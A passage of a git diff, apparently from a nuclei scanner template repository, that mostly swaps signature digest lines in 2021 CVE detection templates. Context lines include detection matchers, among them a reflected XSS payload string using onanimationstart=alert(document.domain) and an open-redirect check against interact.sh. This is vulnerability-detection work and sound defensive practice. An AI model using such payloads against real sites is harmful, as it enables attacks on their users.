490a004630440220396b879300ee930d2f38493e39073877ff41c4af5abc29c947fa5c14aec64ddd022003e133cc244800f7b286f496f65b5c72e57ea4ca88262b2dd450462dc9551af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index ac1d045abd..e13bc1c6c8 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205262ea4dab221e3963ad7f92b32d9b9dad85dfa63eb43144b4d17fb5dfd2371a0220423122b10f03da727e631455d4cd3c7d6adc8f94bd6bf9e89525bf11bdfa97b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220595e42e9d556d5b860ac2a9bc3207e17f4dc91badec2e2d2b3374b4ff73d4e61022064b3a6f861c7a64d293768a29f0be6f3e0f31b62c158193acd688e52edc00042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index fdaad78ff7..4d0c89b56d 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220638af89697796455e81da94a0b565bf04d1772c49363f630e14a8c366cf52334022100d961ae7ead36d711dd2c4b09d124180e8f7e9b14143961e41b8f770f612ec21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7eccba5a861cce486e72884ee3824b74364f868014025a45a4131bc402454c802204b257174d1b932eb3e65f3d2ae1cbdc951be80a7da27b9dd8529014b43d18315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 95412664b1..6147e1b998 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "custom-facebook-feed")' condition: and -# digest: 490a00463044022066171bc49b581bbbebf6e9bec3caae6f91de6cce6ace3ec1704214aab994b6000220419bff836a9ea9a7f671fe1105bc2f9f544d5b7cf562d3934255061ebaeb8388:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa83a00697d269b6cdd964481b903dd4b5069d5728458b99b869b47d6ee1e7ba0220698974fb740ad266961d030e116bfe683009ce16c756a3e4cd82db8ede877d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 0aa6bc1c92..e4ada99808 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")' - 'contains(body_2, "Enter Page Title")' condition: and -# digest: 4a0a00473045022100c83a8800b7738a60c2e6679d08ac8364a83b01e70927c405a8c6a5ab61c297a0022063a98761a2006bab30e128e42f3f9407f213005d4b390a7faf7027e103f4cf29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b820f7d0c8b503290615d361e0a08d402226a096da56aae2ade760918f99fa20221009878e7766f0e0d4ee7a84cb1333925eb17d7d2e639e9644029600f8589a2f900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 5cbce79e79..2bf8ca19f5 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c669b18178ca28119ca6a8bfc6992e205f34d74494ea204e90aafd87ca6506710221009983c4a067b30c7584b1b513ed5c3e345e4900e97b7e9bc61e0e54a2b0072bbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077f210250f3482bba71ed34537c591cdac0a7d3c0ac9e2d84956ae5c8df4d5430220071507b63b43298b7af76742ac5962469b6912baa0b527ac7794bd18a2ebf931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index ae07f65a34..8a40eff141 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_3, "")' - 'contains(body_3, "Affiliates Manager Click Tracking")' condition: and -# digest: 4a0a00473045022100d45c069f29a544929998b412cdaf7084396f20aae8cff0f93ca75a1b591460d202201e599ffe4698dda85884b6e16ba5a83ac94b79c1a3ef46490718bf36107cfa50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205420c61f4ee475a86db3c599da678c923ba014fa64627236d5f17ffd13df56560220707745d963b3cbb472024e4a4378e9b1558221e88182717ff860524bf1d80101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index f116995a9c..2bb357073a 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -48,4 +48,4 @@ http: - 'contains(header_2, "text/html")' - "contains(body_2, '') && contains(body_2, 'contact-form')" condition: and -# digest: 490a004630440220527cd48e142fc92a896aa9a399aaec530758544a07344bf510df911351b0108c022051f1ca942de9836a377cb44c7a038c6f2b740ecceeb66faca7d10b4a7e7f7585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210081018c04073a87e5b7f9d30d4cd03bfeda2b5aeaa62d6f3540b647c8942cf9c502210092c6e5b86f8c67e1d553ac133d0e8558ad59910e9663e93c4ab77d701e538f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index eba5ae5a8a..0f1571ed7a 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9908167df17fe760df5f1a19699d139a5efbb37c3dedd65ffedf9f786c4860002210085485a2e0ded0fe926fbaeb985991879d0ca1ff02fb398695df4569d41ac1248:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b3cc62097692b48f30dee9a31e29edd84cc6b0210ebef1e269f2f80c2f58ac302204e482d374b7af734d30314feb1693a063427895d8f854955b9dfd687e6d3fc91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 437a7437e3..ed93a27ca2 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -49,4 +49,4 @@ http: - 'contains(body, "")' - 'contains(body, "give_user_login")' condition: and -# digest: 4a0a00473045022100b8b1bbb738779094f1c4803577aabec032f44d2bd14d740c5bc4dc129660ed1c0220446b58a14acbdfe6216958668bbfe39c82d48cc2aa45a2dd0645799000150e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c98a60fdfc37512556f1094274d13b080633a1ca2b55936ebc78706b94e40f1802210097f53cc5b2062010ca5f95dc8e2ba351657f0a380ae226bbe6a89baf8d814659:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index 4fe58eeb3a..bcc6264ac6 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c708c9870bc63c69a3f1def25dd27763eaba8128f6e43e0cf88fabc70b5fa5b6022047d48c94f0cc428629cc691003da6be6396610f38fb5143d2b25aeea33bf3452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index cf4851f126..82dd73ca3c 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -54,4 +54,4 @@ http: - status_code == 200 - contains(body_2, 'other_discount_code_') condition: and -# digest: 490a0046304402205779f4688b602f810729763c28227697e17fbe54eabdf2769e00c3efd62634dc0220099aece2ea83884ee11dd109d206c253835129f29b3ea2922f55c13bbcce1686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207de8e73991a2a2ea9f767132a911b28acd5f15f81350811d38a3eed802250e5202202138d48fcec072875db3d63ae94f864885f6b7fe49ca722e648872f42973317a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index fa4359d96f..af3c673ea6 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3ce163f0a4245b48fadd091ce77fffda6474552e66006405db188add5f1336702210088a04491ecf1ec03bde9a145ed885d03c432c745e0df7266f322e4320502f4dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a44c6b99d96752d6d1044219147a287fa483081b4cefde0d0324789ebfdef48002206c44b9b64366d8b7190dc5833adac66733a502824d3172942146a5897d6afe95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 12959a1a31..cb1497a1bf 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022026b9eff4faf7599079f837764767028f6e5520d8f44a5be3b3dda8d7685666760221008230a47ce5142560d40267697a5445d19124ff79ed4623f4fcd9c119b4591483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100832505461e275bee296eefef6ebff2291fa8b9b696b9d14bc16babda7e02dda6022100cfdeaa90b36ac7a7db430d5e6ce75fcdc61cbaefb511b9bd0b44bffc2cbda241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index c22b08f84c..8a0c984469 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -87,4 +87,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 490a0046304402206666d4036d4d35dab96e894b38ad9c5edf03bd115f6e5d9e2b93663420df328c0220408cb9f27506a076cc138fa9720eb3f0fc641f9eb0b01d3742742c5bc0c07c90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2dc206e80ff2c88040bf883e7489d77bd7a4ba89169ffe9abf27e1cf41829d20220116954a4772401f7f08bfc31ae8cc97d5589219a8c1386e5cf7e1b7ccb784c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index d946f96fb6..1171afbe2b 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -87,4 +87,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a00473045022002c535c416c93bf3230b4b497297c11d4d1ee31297754e601903ba6730dfdae1022100a8503c90b036840ad6480ea87590c5fde3b4b3d809100390be430825d84803e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d36f0cf10b4c76f9ddc3bb3bb99e19b442a442dbe42041c7080344d95511da10221009ae56c847e4af6da7ee99e2fb6a713871b9b4c4f18e7a250accfcbe539bedefb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 9348bd038d..301f11c503 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -87,4 +87,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a0047304502207ffbd21c262951d6e67fbd7d2e110f6b43874fabb78cfbc0af65808cacffb342022100d72430ef1b99310c8ea24fa8e2fc77ed72875051b2f4d657e42cd2c2244c5630:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a6b7e8c995a799eab6dbf7031c3c8bcc9cdbe807226b75b4891480a2fe957e6022100ea28cec825f736a274cd6c45321539c8711f0ee8c903afa10db4c2eea1c100df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 83d6bb74ef..62fbab1f27 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -63,4 +63,4 @@ http: - 'name="nsp" value="(.*)">' internal: true part: body -# digest: 4b0a00483046022100d689aec24e353a8512a7a711f112d6a15becf87f58a454eef3116dbbe9f8d432022100c4b79ea5049b4b480e421cafdc165fe61ba55a10946eb5d9f61ce59d1ef8f5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b99d22bd9041fb52ab13aa83d2e997290b17108448b7cbf376053179bd36bee022100ca8607aa86f35144000ea54bac59cc3ac464d1f0f8d3943df0365a02f45c3777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index e8c2507f0a..0f7d610d84 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -94,4 +94,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200fb9d98df795d9808e6862bf4bd9bcb07827c6485050f18ef70a560a6f72c59202206fcce136e7f27d758cba9d444d64704b998c3469b1ee42efdd81942157b76359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f8ca012e45f5c9e01882720401edbd09af0f5fd78ac8b1c231ed983309dce380220313b5fc0157ac972eeda44e2aadeddae294cd8d26c93000fa892cb952195506f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index f7281998c8..6581315c5b 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220232dad6106246e48af27d4140906ad837429c3773f1b6f07ea2a498658394780022100a679963118929eb91997fffc431f95c3fad89464666e87470d287e74825577a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100add2fe38fb27afe8989f0cbd32e14563f1e1b7612526af6dd5d1c723b1b83a1a02210098a88773debb9a23aab1fcd53e0923b246a94a139d5f4f79dade985bfa73f5fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 5a45e0c1fc..cdfecc4579 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and -# digest: 4a0a004730450220032725c31303f01d831554ead8dfbb845e5e5324a12f8fa5b6a83b473c5e565002210094b392e00a4f07522830b49db305a4c03bd5d331a4b9fb5384ab046552e98b77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e93bb93d776a768ecf483221f92c3e95181cf2c0512c41f08b8ec201eabf7b10220373734ce19d8d990ad2571baaf3e154dd70515ef6699bdeb7455a1c8d206fc85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index 8ddeda2511..d498bdb3d7 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f134a1bb31a5f1819448929d1f5a1fb7607689bb3287e0c57970f3ed9b28dff0220487bb1df45ffa1fcc0ccf07cee500d7a022f69f26bd37a565410b759560a2ea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af0669472ee6d120050a756ec247ac4624b4af1627bc9ac9d281331807de32a102210087a3d897f3438b97c0d8112ea154d4f2978a86367008dc2ea10aea18683af8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index d679522076..c391252e5f 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220670cb57e3fae58b67b36bab6ba5d2bc561838e5acd2e94af09eb440761a29dc002201569feec0d7b5543989deae7767a3f8feb7b44f81658e35a09cfffb100e2119c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027d75fdadca9437abc6131d2b609906c1cb927065cfadb69156b64c33f157ad402202d21e0e5dbc0a324e8ffca5f84781731af8c0ffd88e27536dd806221d76f3427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index f075b6d22c..bfc3013b37 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210087c8cc23306c003d3014cabcd4c3cb912e3c4d87482a41215320d2f95b58eda30221009c6e8471eaa49ae0b54f6509e968ff4afd28159693426f81124b8e14abc37fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015b28883b6b7bd8542fc6c3db1f9ed069c5e798dcf8404b8cf598686615b7d4702207a8fd46c908df97e8a8f0aaf59559c77493d7d80fc2dbeb1a377c71d9c0516a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 5504605411..4b06d65837 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e338922cb8b551aff81b4174eeb54b3d03de0063dcba852a37d9e56fca5b6aac022100889322591e888230de5003fd765440786e4839255f6b01983ec19666b8e127f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022060906f5a13e7c9a79ec2f3046802a8847f412fde4539fe308415d82de26ec2880220648670c021a3d7303ba5f0f58d215957aa04ef13aea6d528f7081ae2a2baf80f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index c78b2cb21c..927eacdbd7 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100946db71c9c0e5b872bed57665de3060aba3d7e263f8bb7d763c03046709ab78a022100a5715e19435bd033d5da6cc980eceb717e143e184e8342d77f893624fec063a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e05cf25baf8a7125ea91ca95e393436d8cb7d2602aa6e808cde865dc2fd9a3a022068baef15fbd64e8b03a59d088a802bf3f07555c90cd55279942b9b70dc5a29f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index bfe98d7bc2..197400d710 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -70,4 +70,4 @@ http: part: header words: - "OFBiz.Visitor=" -# digest: 4b0a00483046022100e04458e25cbecebcd58811ac23c6174bce44be12837d57ec0e89d7cbf3f996ac02210094dd842930966ba832f8c767196969e556ed6c5dae58db9b461e66f7eefa4786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220074ac64f44417a7f6d8430a2c662eea374d6863ce79c50927936aa5ec00819b702204b704ebae3b0d400f855b7630f79aae12a9179fbc624517b2ba41c27110eba32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 7508d6e350..898b06b8b6 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -64,4 +64,4 @@ http: - "REQUEST' value='(.*?)'" - 'REQUEST" value="(.*?)"' internal: true -# digest: 490a004630440220212c67e7bb70c702c7016c3707bc652545339b2bf7432cd9856554bf94c4aca7022059f173bc4a50d952ad2daecb41b5db846709ffa51383e8c68eec3f1232702572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebdd70d8922b70f58039980363aed0ef6b5f50c9ea4d53ae9190af3e2727f8af0220299dfb21583a5b4b45ad99f1699e641d9690b2a11068e94e8a967f5de14b09dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index e1273b45ce..8beeb14157 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b48ac40178577233170a5f266ee2c7b513aa37f7b23a52a482a075b66751079022100cb0c07b43883f3e7f17d94e7c61f0729594cc79ccec51c2470e9060313d1e9ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098e7757e0209c423c0f1d06f2a709c9a2fbb69786899327e00431406bc1f66bf022100d79b72cb3177fc66ea667fdcef9bedab883b9acdac3ab0dcafadf79321973aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index df0d84a9e6..1a2d55960e 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c436359876340eb592c03cc12f835097f4b6bc047e5fc3af143ac3088f37b340220357ce113e9758c32d25793658fc5636644aa16bca78df98ec9e0f2eb6b2f7ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de4f3b4ed15065e56c997e9902b14cb33d4129c1fb25571d30298239f4010e06022100fa3448fec140203342018294e9bf58e1e1d07baf5de4a681410bfbfbef4c29f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index d6a8460175..fb201e8353 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022015c16d5c72f64fa026e48a1f863962d923527709b62ec881a563bccc792ff84a022010b46416ae8abc326958a0fd90e2df9159f95afb4615b86068dc15bd734ea504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220490c345e373b59329ef33f2390100f0df9533e5f3f4e3d9f3f88a59a8189081d022100b0d39ad57c7acdf202b65e6d69ce910e585bba593dbeee4178d6d33e08a42380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index f3a73b8679..78871d4c0c 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ebda609c7ab89f085291e361b7d1484576e1270e57d3c66c3086a510088bf420022100dd880ddaa420f7476ba79dc50f12cbc0f7d5c2a225b28a3654c575a703e4838e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c8db9275a2a06cc7c1163e7262105ee0b9dfa2a6a733853ceb08c2d859e0584022100c6421baa661ba03a6ed0144bf811fadf8929e70f64b84737037435723f75e8d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 69ea7ecfe0..5bcdcb6729 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402200fe691411eb53b66b4b48310012159cc2bfc49aa63c0600a307d387ce1aec440022061edab41f21f98729505a5cc7d7b10ac98eca71c97400b948a630967c9e0a0b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220739717cfdce2e0373ef8d65dd1d94307d5cf47b90e78cece9ded1ece8cdfd6a302206eb0c5526d9b799bfea075230f373f32f084be5be819bb53d6ec0d0d96596dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index e9034cf85f..70fb97f4f7 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a402101096ce7def9e01253aed74d686ca491e1c4b6fad1a0591a5662520cb8e02203e62bb17eb3da7850635c125c56f5cb8f51ba1520a03e9a3c04ff2998a38a8b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203d036295d63d5d610dc81aba6f9e643f94d7bb641f9bc100917c9304a6f54d92022100b35b31dbc0d9ebd8c0652ad91f58d1361d486a199a81ec03cb8f4d2e1a692bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 580f90c681..b7da1fbc9e 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b00fbd835bf6365747ca455e3baf330c2bf123afee61ae0f8981aa1dab11857022100ef6c2c713eaa742043860a3f65409516d36de9988dd7053879e71c4db8f4a572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c87a96a99fe91bc4f66db14b729c4c3899aaf8dc807d296ffc2ba25bf8b5e645022005527effb1edd34301335e3af7e55c9d52becdc54ef12a67bb08a563b3fd13bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index aaa515527c..29c3843bb7 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 490a0046304402203675b5d024d7265ccc67751fa18a9456a08d9a6cfba7a69c677161ab2b54dc1202206a32db3d0a1aef4093b4b7de58ba04d3ca09b26a9ae9b2d325c794a17008810e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220608993eb6c162f41af6eca78ee5e37966f90692f167c67e2f39623c90a6af11d022100bab80bd88b7acfd20895fdd9f38e249825760da11586f3cb851af29d59def924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 943ccdb933..adb48b1905 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a00473045022100fa576cee94b83d7c02ff3f920da22eb82e877217997d45a6843359a9ffc7662902205ede6cd0bf165f8d505aefe36928930b5e3b2e68db775a7a684c6f125a86d3e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 